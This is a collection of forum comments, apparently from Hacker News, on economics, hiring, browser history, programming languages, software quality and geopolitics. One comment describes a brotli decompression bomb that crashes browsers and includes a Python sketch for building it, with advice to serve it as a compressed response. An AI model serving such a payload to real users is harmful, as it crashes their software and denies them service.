Using a national currency as the de facto global reserve guarantees a trade deficit for that country.
No one else can manufacture US dollars, so other countries have to acquire them by shaping their economies to supply goods and services demanded by the US. They can then use these earned dollars to transact with other countries, as the US itself insists they do.
For the US, this is a simple trade-off - gain massive political influence (and market intelligence - all USD transactions go through US institutions regardless of where the transacting parties are located), at the expense of hollowing out domestic industry and running a deficit in physical goods traded.
The solution is a non-national global reserve, based on a basket of national currencies. This was Keynes's argument at Bretton Woods, but the US would not have it then, and does not want it now.
For context, "worse is better" refers to Gabriel's observation that products with simple implementations and complicated interfaces tend to achieve adoption faster than products with complex implementations and elegant interfaces.
One of the original motivating examples was Unix-like systems (simple implementation, few correctness guarantees in interfaces) vs. Lisp-based systems (often well-specified interfaces, but with complicated implementations as the cost).
If you aren't hiring junior engineers to do these kinds of things, where do you think the senior engineers you need in the future will come from?
My kid recently graduated from a very good school with a degree in computer science, and what she's told me about the job market is scary. It seems that, relatively speaking, there are a lot of postings for senior engineers and very little for new grads.
My employer has hired recently and the flood of resumes after posting for a relatively low level position was nuts. There was just no hope of giving each candidate a fair chance and that really sucks.
My kid's classmates who did find work did it mostly through personal connections.
People forget that every transaction has two parties. Someone's debt is another's asset. The national debt is mostly owned by Americans. That means the national debt is an asset to the private sector. This is the way all money works because money IS debt.
The real crisis is high debt loads in the private sector, not the government. Why? Because the government owns the currency its debts are denominated in. There is zero risk the government couldn't pay its dollar debts if there is still a US government. The only reason to downgrade is if there is a real risk the US government will collapse and cease to exist for political reasons. There is no fiscal risk.
The deficit hawks don't understand how money works. The real concern is private debts, not government debts. But you never hear about that in the media.
I was involved in an M&A once; my role was to evaluate the technology and determine how long it would take us to build a competitive product. If it was less than some X then we’d build it, greater than X and we’d buy. The function for X was not clear from my perspective; it involved legal fees, etc.
The person leading M&A said an intangible aspect of the price is what it does to the adjacent market. If the leading product A is valued during a raise at $Y, and you buy the next best product B at 1/10 that, you cause future issues with raises for A.
As an American, I’m doing what I can to boycott stuff made in red states. I can and do pay up to 2x more for blue state stuff (which is typically higher quality, to be honest), and go imported otherwise.
"In 2013 i met a very close friend of Steve Jobs and i remember saying "there's one thing i absolutely have to know, it's really important to me" he responds "okay what is it?"
I ask "what was all the money for?!" puzzled "what do you mean?" "Steve Jobs saved up like 200 billion dollars in cash at Apple, but what was it all for? what was the plan? was he going to buy AT&T? was he going to build his own telecom or make a giant spaceship? what was it for?"
And he looked at me with just the deepest and saddest eyes and spoke softly "there was no plan" "what??" "you see, Steve's previous company, NeXT, it ran out of money, so at Apple he always wanted a pile of money on the side, just in case. and over the years, the pile grew and grew and grew... and there was no plan..."
> > Codecs. VP8/9 and AV1 broke the mpeg alliance monopoly and made non patented state of the art video compression possible.
> Could agree. Not sure of Google's real contribution to those.
They were not the only contributor (I was the technical lead for Mozilla's efforts in this space), but they were by far the largest contributor, in both dollars and engineering hours.
I think you should appreciate more how much the tens of billions of dollars Google has invested in Chrome has benefited the web and open source in general. Some examples:
WebRTC. Google’s implementation is super widely used in all sorts of communications software.
V8. Lots of innovation on the interpreter and JIT has made JS pretty fast, and V8 is reused in lots of other software like Node.js, Electron, etc.
Sandboxing. Chrome did a lot of new things here like site isolation and Firefox took a while to catch up.
Codecs. VP8/9 and AV1 broke the mpeg alliance monopoly and made non patented state of the art video compression possible.
SPDY/QUIC. Thanks to Google we now have zero-RTT TLS handshakes, HTTP with header compression and no head-of-line blocking, etc., and H3 has mandatory encryption.
Here's a brotli file I created that's 81MB compressed and 100TB uncompressed[1] (bomb.br). That's a 1.2M:1 compression ratio (higher than any other brotli ratio I see mentioned online).
There's also a script in that directory that allows you to create files of whatever size you want (hovering around that same compression ratio). You can even use it to embed secret messages in the brotli (compressed or uncompressed). There's also a python script there that will serve it with the right header. Note that for Firefox it needs to be hosted on https, because Firefox only supports brotli over https.
Back when I created it, it would crash the entire browser of ESR Firefox, crash the tab of Chrome, and would lead to a perpetually loading page in regular Firefox.
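If you're curious how little machinery this takes, here's a minimal sketch of the same idea (it is not the script from that directory). It assumes the third-party brotli package (pip install Brotli) and simply compresses a long run of zero bytes, which is the best case for the format; the file name and sizes below are just for illustration:

    import brotli  # pip install Brotli

    # 64 MB of identical bytes -- long runs like this are the best case
    # for brotli, so the compressed output is tiny relative to the input.
    raw = b"\x00" * (64 * 1024 * 1024)
    compressed = brotli.compress(raw, quality=11)

    with open("bomb.br", "wb") as f:
        f.write(compressed)

    print(f"uncompressed: {len(raw):,} bytes")
    print(f"compressed:   {len(compressed):,} bytes")
    print(f"ratio:        {len(raw) // len(compressed):,}:1")

    # To use it as a decompression bomb, serve the file with the header
    #   Content-Encoding: br
    # (over HTTPS if the client is Firefox, as noted above).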
The US is falling way behind in electric vehicles. If BYD could sell in the US, the US auto industry would be crushed.[1]
What went wrong is that 1) Tesla never made a low-end vehicle, despite announcements, and 2) all the other US manufacturers treated electric as a premium product, resulting in the overpowered electric Hummer 2 and F-150 pickups with high price tags. The only US electric vehicle with comparable prices in electric and gasoline versions is the Ford Transit.
BYD says that their strategy for now is to dominate in every country that does not have its own auto industry. Worry about the left-behind countries later.
BYD did it by 1) getting lithium-iron batteries to be cheaper, safer, and faster-charging, although heavier than lithium-ion, 2) integrating rear wheels, differential, axle, and motor into an "e-axle" unit that's the entire mechanical part of the power train, and 3) building really big auto plants in China.
Next step is to get solid state batteries into volume production, and build a new factory bigger than San Francisco.
I think that Zig's simplicity hides how revolutionary it is, both in design and in potential. It reminded me of my impression of Scheme when I first learned it over twenty years ago. You can learn the language in a day, but it takes a while to realize how exceptionally powerful it is. But it's not just its radical design that's interesting from an academic perspective; I also think that its practical goals align with mine. My primary programming language these days is C++, and Zig is the first low-level language that attempts to address all of the three main problems I see with it: language complexity, compilation speed, and safety.
In particular, it has two truly remarkable features that no other well-known low-level language -- C, C++, Ada, or Rust -- has or can ever have: lack of macros and lack of generics (and the associated concepts/typeclasses) [1]. These are very important features because they have a big impact on language complexity. Despite these features, Zig can do virtually everything those languages do with macros [2] and/or generics (including concepts/typeclasses), and with the same level of compile-time type safety and performance: their uses become natural applications of Zig's "superfeature" -- comptime.
Other languages -- like Nim, D, C++ and Rust -- also have a feature similar to Zig's comptime or are gradually getting there, but what Zig noticed was that this simple feature makes several other complex and/or potentially harmful features redundant. Antoine de Saint-Exupery said that "perfection is achieved, not when there is nothing more to add, but when there is nothing left to take away." I think that Zig, like Scheme -- and yes, there are others -- is close to that minimalist vision of perfection.
What a truly inspiring language. Rather than asking how we could make C++'s general philosophy work better, as another increasingly famous language does, IMO it asks how we could reshape low-level programming in a way that's a more radical break with the past. I think it's a better question to ask. Now all that's left to hope for is that Zig gets to 1.0 and gains some traction. I, for one, would love to find a suitable alternative to C++, and I believe Zig is the first language that could achieve that in a way that suits my particular taste.
[1]: I guess C has the second feature, but it loses both expressivity and performance because of it.
[2]: Without the less desirable things people can do with macros.
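To illustrate the "generics as applications of comptime" point, here is a loose analogue in Python (not Zig): a plain function that takes a type and returns a type. Zig evaluates the equivalent function at compile time with full type checking; Python can only do this at runtime, so treat this as a sketch of the shape of the idea, with all names invented for the example.

    # A runtime analogue of "generics are just functions from types to types".
    # In Zig the equivalent runs at comptime and is fully type-checked.

    def make_stack(element_type: type) -> type:
        """Return a stack class specialized to one element type."""

        class Stack:
            def __init__(self) -> None:
                self._items = []

            def push(self, item) -> None:
                if not isinstance(item, element_type):
                    raise TypeError(f"expected {element_type.__name__}")
                self._items.append(item)

            def pop(self):
                return self._items.pop()

        Stack.__name__ = f"Stack[{element_type.__name__}]"
        return Stack

    IntStack = make_stack(int)   # the "instantiation" step
    s = IntStack()
    s.push(3)
    try:
        s.push("oops")
    except TypeError as err:
        # Zig's comptime would reject the equivalent code at compile time.
        print("rejected:", err)
    print(s.pop())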
China, based on demographics alone, will never be a demand-based consumption economy. The only reason so much stuff is still made in China is the sunk cost of building an industrial complex.
In the end, it really doesn't matter what the issues with China are. There are endless points showing, if you bother to look into them, that the Chinese are not peers of the US. However, the US needs an external boogeyman who appears competent to make politics work.
No it isn't 'capital flight' Noah - that's a fixed exchange rate concept. There are no fewer dollars in the US dollar currency area after the sale than before.
Specifically "Normally, when Treasuries get sold off, people park their money in cash, instead of moving it overseas. This time, a bunch of investors actually pulled their money out of America entirely."
They didn't, because to get out you need a bunch of other investors putting their money into America; otherwise there would be no exchange in the first place.
It's a fallacy of composition. Individual investors can sell their dollars and buy euros, but investors overall cannot. Somebody has to be selling euros and buying dollars, and the question has to be asked "what did they do with those dollars when they got them, and why were they coming in that direction in the first place?".
Liquidating static savings and pushing them back into the flow tends to cause more physical transactions to occur. It's taking money out of a drawer and spending it. That's likely stimulative.
Old school web tech is the best. I still reach for multipart/form-data every day. Many of my web applications do not even have javascript.
I hope at some point the original pattern is re-discovered and made popular again because it would make things so much snappier:
1. Initial GET request from user's browser against index and maybe favicon.
2. Server provides static/dynamic HTML document w/ optional JS, all based upon any session state. In rare cases, JS is required for functionality (camera, microphone, etc.), but usually is just to enhance the UX around the document.
3. User clicks something. This POSTs the form to the server. The server takes the form elements, handles the request, and then as part of the same context returns the updated state as a new HTML document in the POST response body.
4. That's it. The web browser, if it is standards compliant, will then render the resulting response as the current document and the process repeats.
All of this can happen in a single round trip. Latency is NOT a viable argument against using form submissions. I don't think suffering window navigation events is a valid one either. At some point, that SPA will need to talk to the mothership. The longer it's been disconnected, the more likely it's gonna have a bad time.
The web only has to be hard if you want to make it hard. Arguments against this approach always sound resume-driven more than customer-driven. I bet you would find some incredibly shocking statistics regarding the % of developers who are currently even aware of this path.
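To make the flow above concrete, here is a minimal sketch using only the Python standard library. It uses a plain urlencoded form rather than multipart/form-data to keep the parsing short, and the port, field names, and page markup are invented for the example.

    from html import escape
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.parse import parse_qs

    PAGE = """<!doctype html>
    <title>Old school</title>
    <p>{message}</p>
    <form method="post" action="/">
      <input name="name" placeholder="Your name">
      <button type="submit">Send</button>
    </form>
    """

    class Handler(BaseHTTPRequestHandler):
        def _send(self, html: str) -> None:
            body = html.encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def do_GET(self):
            # Steps 1-2: serve the initial HTML document.
            self._send(PAGE.format(message="Hello, stranger."))

        def do_POST(self):
            # Steps 3-4: handle the form, return the updated state as a
            # new HTML document in the POST response body.
            length = int(self.headers.get("Content-Length", 0))
            fields = parse_qs(self.rfile.read(length).decode("utf-8"))
            name = fields.get("name", ["stranger"])[0]
            self._send(PAGE.format(message=f"Hello, {escape(name)}."))

    if __name__ == "__main__":
        HTTPServer(("localhost", 8000), Handler).serve_forever()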
The first is that LLMs are bar none the absolute best natural language processing and producing systems we’ve ever made. They are absolutely fantastic at taking unstructured user inputs and producing natural-looking (if slightly stilted) output. The problem is that they’re not nearly as good at almost anything else we’ve ever needed a computer to do as other systems we’ve built to do those things. We invented a linguist and mistook it for an engineer.
The second is that there’s a maxim in media studies which is almost universally applicable: the first use of a new medium is to recapitulate the old. The first TV was radio shows, the first websites looked like print (I work in synthetic biology, and we’re in the “recapitulating industrial chemistry” phase). It’s only once people become familiar with the new medium (and, really, when you have “natives” to that medium) that we really become aware of what the new medium can do and start creating new things. It strikes me we’re in that recapitulating phase with the LLMs - I don’t think we actually know what these things are good for, so we’re just putting them everywhere and redoing stuff we already know how to do with them, and the results are pretty lackluster. It’s obvious there’s a “there” there with LLMs (in a way there wasn’t with, say, Web 3.0, or “the metaverse,” or some of the other weird fads recently), but we don’t really know how to actually wield these tools yet, and I can’t imagine the appropriate use of them will be chatbots when we do figure it out.
The March 8, 2025 and March 15, 2025 issues focus on how the rest of the world is responding to the repositioning of the US government and increased supply chain disruption. Those two issues are worth reading if supply chains, imports, or exports impact anything you're involved with.
The ASML article is hinting that Europe should fab more of its own ICs. Most of ASML's equipment is exported, not used within Europe. It's not that ASML wants to leave Europe. It's that they need more European customers.
Other articles in those two issues cover how Europe is starting to respond to American isolationism and Russian aggression. US threats to pull out of NATO are taken seriously, and contingency plans for a post-US NATO are underway. It looks like France will provide the nuclear deterrent. France's nuclear weapons program is not dependent on the US, but the UK's is. Further acquisition of US fighter aircraft is now much less likely. There's a concern that the F-35 is too "cloud enabled" and dependent on US data sources. The Swedish Gripen is looking like a better option. Efforts to replace US satellite dependency are underway, with recent launches on Ariane boosters from French Guiana. Reduction of EU dependence on the US internet is progressing. All the countries with borders facing Russia or Ukraine have upped military spending considerably. There's debate from the countries further from the front line on how much they have to.
Decades-old alliances and trade patterns are shifting. Europe has less of a problem with China than the US does. Russia is much closer, has caused trouble for a century, and there's a lot of bad history there. The US has a long history with Japan, South Korea, and Taiwan, but Europe does not. Nor does Europe have any obligations to Israel, which helps when getting along with the Arab world.
Read more non-US sources on what's happening. Huge, slow changes are underway.
I did not do many things in Delphi, but I have studied the language and VCL architecture for the very purpose of determining why it is so approachable and productive (as compared to C, Java, JS, Python and the tooling around them).
In my opinion, it is the result of the following qualities:
1. The language directly supports concepts needed for live WYSIWYG editing (i.e. properties and events) while other languages only simulate it by convention (e.g. the Java Bean specification)
2. The language syntax is simple enough for the IDE to understand and modify programmatically, but powerful. The properties files that define the forms are even simpler, support crucial features (i.e. references and hierarchy) but do not bring unnecessary complexity as general-purpose formats do (XML files or JSON)
3. Batteries included - you can do very powerful stuff with the included components (gui, i/o, ipc, sql, tcp/ip, graphics - all the practical stuff) without hunting for libraries
4. Discoverability - the visual component paradigm with Property editor lets you see all your possibilities without reading the documentation.
5. Extensibility - you can build your own components that fully integrate with the IDE. This is my litmus test for low-code and RAD tools: For any built-in feature, can I recreate the same using the provided tools? Many tools fail this, and the built-in components can do things that are inaccessible to user-defined components.
6. Speed - both compilation and runtime, thanks to one-pass compilation and native code. Leads to fast iteration times.
7. The VCL component architecture is a piece of art. The base classes implement all the common functionality: they automatically manage memory, can store and load persistent state, have properties for visual placement (position, size), etc. The language features really help here (I remember something about interface delegation) but there is no magical runtime that does this from the outside; it's an actual implementation of the component that can be extended or overridden.
But of course there are the ugly things as well: alien syntax, forward declarations, a strict compiler that blocks the Form Designer on any error, preventing you from fixing the very error, and most of all: while there is very good abstraction for the components, there is none for data and state. There is no good tooling for data modelling and working with the data models. That leads to poor practices such as keeping state in the visual components or in global variables.
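As a rough illustration of point 1 above, here is a small Python (not Object Pascal) sketch of what "properties and events" buy a form designer: a component exposes named properties plus an event hook, and a designer can discover and set them generically instead of generating code. The class and property names are invented for the example.

    from typing import Callable, Optional

    class Button:
        """A minimal 'component' with published properties and one event."""

        def __init__(self) -> None:
            self.caption: str = "Button1"
            self.left: int = 0
            self.top: int = 0
            self.on_click: Optional[Callable[[], None]] = None  # the event hook

        def click(self) -> None:
            # The runtime fires the event; user code only assigns the handler.
            if self.on_click is not None:
                self.on_click()

    # What a form designer effectively does: enumerate properties, set them
    # from a saved form description, and wire up the event handler.
    btn = Button()
    for name, value in {"caption": "OK", "left": 8, "top": 8}.items():
        setattr(btn, name, value)
    btn.on_click = lambda: print(f"{btn.caption} clicked")
    btn.click()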
I keep being tempted to write the same post but named "Does all software work like shit now?", because I swear, this is not just Apple. Software in general feels buggier, and that's the new norm.
Most websites have an element that won't load on the first try, or a button that sometimes needs to be clicked twice because the first click did nothing.
The Amazon shopping app needs two clicks every now and then, because the first one didn't do what it was supposed to do. It's been like that for at least 3 years.
Spotify randomly stops syncing play status with its TV app. Been true for at least a year.
The HBO app has had the subtitles for one of my shows out of sync for more than a year.
Games, including AAA titles, need a few months of post-release fixes before they stabilize and stop having things jerk themselves into the sky or something.
My robot vacuum app just hangs up forever once in a while and needs to be killed to work again, takes 10+ seconds after start to begin responding to taps, and it has been like that for over 2 years of owning the device.
Safari has had a bug where, if you open a new tab and type "search term" too quickly, it opens the URL http://search%20term instead of doing a Google search. I opened a bug for that 8 years ago, which was closed as a duplicate, and just recently experienced it again.
It really seems the bar for "ready for production" is way lower now. At my first job 13+ years ago, if any QA noticed any of the above, the next version wouldn't be out until it was fixed. Today, if a "Refresh" button or restarting the app fixes it: approved, green light, release it.
As a former Apple employee that left in part due to declining software quality (back in 2015!), and the relentless focus on big flashy features for the next yearly release cycle, I could not agree more.
I recently had to do a full reinstall of macOS on my Mac Studio due to some intermittent networking issue that, for the life of me, I could not pin down. Post-reinstall, everything's fine.
Mid-tier engineers are the most dangerous type of engineer: they've learned enough to make decent abstractions, and they tend to run with that, over-engineering everything they touch.
IMO it is better said that Go is designed to be a good language for senior and junior developers, while mid-tiers will probably hate it.
Speaking as the person who personally ran 10.6 v1.1 at Apple (and 10.5.8): you are wrong(ish).
The new version of the OS was always being developed in a branch/train, and fixes were backported to the current version as they were found. They weren't developed linearly / one after another. So yeah, if you are comparing the most stable polished/fixed/stagnant last major version with the brand new 1.0 major version branch, the newer major is going to be buggier. That would be the case with every y.0 vs x.8. But if you are comparing major OS versions, Snow Leopard was different.
Snow Leopard's stated goal internally was reducing bugs and increasing quality. If you wanted to ship a feature you had to get explicit approval. In feature releases it was bottom up "here is what we are planning to ship" and in Snow Leopard it was top down "can we ship this?".
AFAIK Snow Leopard was the first release of this kind (the first release I worked on was Jaguar or Puma), and was a direct response to taking 8 software updates to stabilize 10.5 and the severity of the bugs found during that cycle and the resulting bad press. Leopard was a HUGE feature release and with it came tons of (bad) bugs.
The Apple v1.1 software updates always fixed critical bugs, because:
1. You had to GM / freeze the software to physically create the CDs/DVDs around a month before the release. Bugs found after this process required a repress (can't remember the phrase we used), which cost money and time and scrambled effort at the last minute and added risk. This means the bar was super high, and most "bad, but not can't use your computer bad" bugs were put in v1.1...which was developed concurrently with the end of v1.0 (hence why v1.1s came out right away)
2. Testing was basically engineers, internal QA, some strategic partners like Adobe and MS, and the Apple Seed program (which was tiny). There was very little automated testing. Apple employees are not representative of the population and QA coverage is never very complete. And we sometimes held back features from seed releases when we were worried about leaks, so it wasn't even the complete OS that was being tested.
A v1.1 was always needed, though the issues they fixed became less severe over time due to larger seeds (aka betas), recovery partitions, and better / more modern development practices.
Probably an agreeability thing? The iconoclasts who get things done tend to be disagreeable, but success at a reality scale is different than success in a large company.
You get promoted and move up because of your peer group's support, which creates a strong incentive not to rock the boat or go against sacred cows that work well enough. The person who succeeds in a big company after a hypergrowth phase is a very different person than the one who made the hypergrowth happen.
They did this during the period where Chrome was eating into Firefox usage, after telling Mozilla that they would drop H.264 in favor of open codecs but never keeping that promise. Here’s some period discussion:
What this meant in practice was that Firefox would play YouTube videos at close to 100% CPU and Chrome would use H.264 and play at like 5% CPU, and since it was VP8 the quality was noticeably worse than H.264 as well. Regular people talked about that a lot, and it helped establish Chrome’s reputation for being faster.
Could you explain what you mean by "8-wide decode in many places"? How is that possible; isn't instruction decoding kinda always the same width? I.e. always 4-wide or always 8-wide, but not sometimes this and sometimes that.
All sources I could find say it is 4-wide, so I'd also be interested if you could perhaps give a link to a source?
That's my overall point of view too. Regardless of infinite technical discussions about one or the other, if Alice and Bob can't live together then they just shouldn't get married.
Why spend all this energy on conflict and drama to no end? If one language/technology/group is so much better then just fork the thing and follow their own path.
I'm actually not defending the C guys, I just want to leave them alone and let "Nature" take its course. If they die of obsolescence, then they die. Who cares...
Doesn't that make software engineers one of the few employees with much worse tax treatment?